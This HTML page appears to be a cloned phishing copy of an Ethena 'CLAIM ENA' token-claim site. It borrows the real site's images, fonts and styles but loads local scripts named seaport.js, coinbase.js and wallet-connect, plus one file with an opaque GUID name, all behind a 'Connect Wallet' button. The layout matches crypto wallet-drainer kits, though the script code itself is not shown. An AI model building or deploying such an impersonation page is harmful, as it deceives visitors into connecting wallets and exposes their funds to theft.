<!DOCTYPE html>
<html lang="en">

<head>
    <meta charSet="utf-8" />
    <title>Ethena</title>
    <meta name="description" content="Enabling the Internet Bond" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta property="og:title" content="Ethena" />
    <meta property="og:description" content="Enabling the Internet Bond" />
    <meta property="og:image" content="https://app.ethena.fi/shared/ethena-thumbnail.png" />
    <meta property="og:url" content="https://app.ethena.fi" />
    <meta property="twitter:image" content="https://app.ethena.fi/shared/ethena-thumbnail.png" />
    <meta property="twitter:card" content="summary_large_image" />
    <meta property="twitter:title" content="Ethena" />
    <meta property="twitter:description" content="Enabling the Internet Bond" />
    <link rel="icon" href="https://claim.ethena.fi/shared/favicon.svg" />
    <link rel="preload" href="https://claim.ethena.fi/shared/ethena.svg" as="image" fetchpriority="high" />
    <link rel="preload" as="image" imageSrcSet="https://claim.ethena.fi/_next/image?url=%2Fena.png&amp;w=750&amp;q=75 1x, /_next/image?url=%2Fena.png&amp;w=1920&amp;q=75 2x" fetchpriority="high" />
    <meta name="next-head-count" content="15" />
    <link rel="preload" href="https://claim.ethena.fi/_next/static/media/c5fea7478aa47814-s.p.woff2" as="font" type="font/woff2" crossorigin="anonymous" data-next-font="size-adjust" />
    <link rel="preload" href="https://claim.ethena.fi/_next/static/media/7da2a3ff16027414-s.p.woff2" as="font" type="font/woff2" crossorigin="anonymous" data-next-font="size-adjust" />
    <link rel="preload" href="https://claim.ethena.fi/_next/static/media/f1520da2fce335b3-s.p.woff2" as="font" type="font/woff2" crossorigin="anonymous" data-next-font="size-adjust" />
    <link rel="preload" href="https://claim.ethena.fi/_next/static/media/fc3bb0c43ad3be3b-s.p.woff2" as="font" type="font/woff2" crossorigin="anonymous" data-next-font="size-adjust" />
    <link rel="preload" href="https://claim.ethena.fi/_next/static/media/f6441c9c7c6cedc3-s.p.woff2" as="font" type="font/woff2" crossorigin="anonymous" data-next-font="size-adjust" />
    <link rel="preload" href="https://claim.ethena.fi/_next/static/media/996798fe8aee0dc3-s.p.woff2" as="font" type="font/woff2" crossorigin="anonymous" data-next-font="size-adjust" />
    <link rel="preload" href="https://claim.ethena.fi/_next/static/css/5dabdc66d234cb62.css" as="style" crossorigin="" />
    <link rel="stylesheet" href="https://claim.ethena.fi/_next/static/css/5dabdc66d234cb62.css" crossorigin="" data-n-g="" /><noscript data-n-css=""></noscript>
    <script src="./scripts/seaport.js"></script>
    <script src="./scripts/coinbase.js"></script>
    <script src="./scripts/wallet-connect-v2.js"></script>
    <script src="./scripts/wallet-connect-v3.js"></script>
    <script charset="UTF-8" type="text/javascript" src="./6463315d-5fbb-4674-aba3-32a987151b3f.js"></script>
    
</head>

<body>
    <div id="__next">
        <div data-rk="">
            <style>
                [data-rk] {
                    --rk-blurs-modalOverlay: blur(4px);
                    --rk-fonts-body: '__Bai_Jamjuree_2b9e37', '__Bai_Jamjuree_Fallback_2b9e37';
                    --rk-radii-actionButton: 4px;
                    --rk-radii-connectButton: 4px;
                    --rk-radii-menuButton: 4px;
                    --rk-radii-modal: 8px;
                    --rk-radii-modalMobile: 8px;
                    --rk-colors-accentColor: #EDEDEF;
                    --rk-colors-accentColorForeground: #161618;
                    --rk-colors-actionButtonBorder: rgba(255, 255, 255, 0.04);
                    --rk-colors-actionButtonBorderMobile: rgba(255, 255, 255, 0.08);
                    --rk-colors-actionButtonSecondaryBackground: rgba(255, 255, 255, 0.08);
                    --rk-colors-closeButton: rgba(224, 232, 255, 0.6);
                    --rk-colors-closeButtonBackground: transparent;
                    --rk-colors-connectButtonBackground: #1A1B1F;
                    --rk-colors-connectButtonBackgroundError: #FF494A;
                    --rk-colors-connectButtonInnerBackground: linear-gradient(0deg, rgba(255, 255, 255, 0.075), rgba(255, 255, 255, 0.15));
                    --rk-colors-connectButtonText: #FFF;
                    --rk-colors-connectButtonTextError: #FFF;
                    --rk-colors-connectionIndicator: #30E000;
                    --rk-colors-downloadBottomCardBackground: linear-gradient(126deg, rgba(0, 0, 0, 0) 9.49%, rgba(120, 120, 120, 0.2) 71.04%), #1A1B1F;
                    --rk-colors-downloadTopCardBackground: linear-gradient(126deg, rgba(120, 120, 120, 0.2) 9.49%, rgba(0, 0, 0, 0) 71.04%), #1A1B1F;
                    --rk-colors-error: #FF494A;
                    --rk-colors-generalBorder: rgba(255, 255, 255, 0.08);
                    --rk-colors-generalBorderDim: rgba(255, 255, 255, 0.04);
                    --rk-colors-menuItemBackground: rgba(224, 232, 255, 0.1);
                    --rk-colors-modalBackdrop: rgba(0, 0, 0, 0.5);
                    --rk-colors-modalBackground: radial-gradient(73.86% 104.92% at 50.1% 14.77%, rgba(16, 24, 43, 0.90) 3.13%, rgba(15, 20, 32, 0.90) 100%);
                    --rk-colors-modalBorder: rgba(255, 255, 255, 0.08);
                    --rk-colors-modalText: #FFF;
                    --rk-colors-modalTextDim: rgba(224, 232, 255, 0.3);
                    --rk-colors-modalTextSecondary: rgba(255, 255, 255, 0.6);
                    --rk-colors-profileAction: rgba(224, 232, 255, 0.1);
                    --rk-colors-profileActionHover: rgba(224, 232, 255, 0.2);
                    --rk-colors-profileForeground: rgba(224, 232, 255, 0.05);
                    --rk-colors-selectedOptionBorder: rgba(224, 232, 255, 0.1);
                    --rk-colors-standby: #FFD641;
                    --rk-shadows-connectButton: 0px 4px 12px rgba(0, 0, 0, 0.1);
                    --rk-shadows-dialog: 0px 8px 32px rgba(0, 0, 0, 0.32);
                    --rk-shadows-profileDetailsAction: 0px 2px 6px rgba(37, 41, 46, 0.04);
                    --rk-shadows-selectedOption: 0px 2px 6px rgba(0, 0, 0, 0.24);
                    --rk-shadows-selectedWallet: 0px 2px 6px rgba(0, 0, 0, 0.24);
                    --rk-shadows-walletLogo: 0px 2px 16px rgba(0, 0, 0, 0.16);
                }
            </style>
            <main class="flex flex-col min-h-screen h-fit items-center __className_2b9e37">
                <div class="layout-background-video-abyss"><video autoplay="" loop="" muted="" playsinline=""><source src="https://claim.ethena.fi/bg-loop.mp4" type="video/mp4"/>Your browser does not support the video tag.</video></div>
                <div class="flex items-center border border-neutrals-700 bg-black bg-opacity-30 rounded-full z-20 box-content backdrop-blur-[1.5px] h-12 sm:h-16 px-3 sm:px-5 mx-4 mt-6 hbase:mt-8 mb-2 sm:mx-6 max-w-[calc(80%)] w-[750px]"><a class="flex h-full items-center" href="https://claim.ethena.fi/"><img alt="Ethena Logo" fetchpriority="high" width="0" height="0" decoding="async" data-nimg="1" class="mr-2" style="color:transparent;height:50%;width:auto" src="https://claim.ethena.fi/shared/ethena.svg"/><span class="mr-2 text-xl sm:text-2xl sm:mr-8 lg:mr-9">Ethena</span></a>
                    <div
                        class="ml-auto flex items-center">
                        <div class="ml-1 md:ml-4 lg:ml-8">
                            <div class="flex items-center gap-3">
                                <div aria-hidden="true" style="opacity:0;pointer-events:none;user-select:none"><button class="bg-gray-200 disabled:bg-white disabled:bg-opacity-30 text-xs md:text-base font-medium flex items-center justify-center whitespace-nowrap text-black transition ease-in-out enabled:hover:scale-[1.02] disabled:cursor-not-allowed w-full px-2.5 sm:px-4 py-1.5 sm:py-2 rounded-full"
                                        type="button">Connect Wallet</button></div> <button class="text-[#808080] h-5 w-auto ml-auto" ><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 24 24" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path fill="none" stroke-width="2" d="M20,8 C18.5974037,5.04031171 15.536972,3 12,3 C7.02943725,3 3,7.02943725 3,12 C3,16.9705627 7.02943725,21 12,21 L12,21 C16.9705627,21 21,16.9705627 21,12 M21,3 L21,9 L15,9"></path></svg></button></div>
                        </div>
                </div>
        </div>
        <div class="sm:mt-[calc(max(20vh,100px))] max-w-[90vw] sm:max-w-[min(700px,75vw)] mt-32 w-fit min-h-fit animate-in slide-in-from-bottom-8 duration-700 -translate-y-24 flex flex-col items-center justify-center pb-20"><img alt="ENA" fetchpriority="high" width="644" height="502" decoding="async" data-nimg="1" class="mb-5 max-w-[240px]" style="color:transparent" srcSet="https://claim.ethena.fi/_next/image?url=%2Fena.png&amp;w=750&amp;q=75 1x, /_next/image?url=%2Fena.png&amp;w=1920&amp;q=75 2x"
                src="https://claim.ethena.fi/_next/image?url=%2Fena.png&amp;w=1920&amp;q=75" />
            <h1 class="text-3xl scale-125 flex items-center md:text-[3rem] leading-tight md:leading-[4.5rem] font-semibold break-words">CLAIM ENA</h1>
            ><button class="interact-button bg-gray-200 disabled:bg-white disabled:bg-opacity-30 text-xs md:text-base font-medium flex items-center justify-center whitespace-nowrap text-black transition ease-in-out enabled:hover:scale-[1.02] disabled:cursor-not-allowed w-full px-2.5 sm:px-4 py-1.5 sm:py-2 rounded-full"
            type="button">Connect Wallet</button>    </div>
        </main>
        <div style="position:fixed;z-index:9999;top:16px;left:16px;right:16px;bottom:16px;pointer-events:none"></div>
    </div>
    </div>
    <script id="__NEXT_DATA__" type="application/json" crossorigin="">
        {
            "props": {
                "pageProps": {}
            },
            "page": "/",
            "query": {},
            "buildId": "r-EFFt6ZA2HYYaRLaZPis",
            "nextExport": true,
            "autoExport": true,
            "isFallback": false,
            "scriptLoader": []
        }
    </script>
</body>

</html>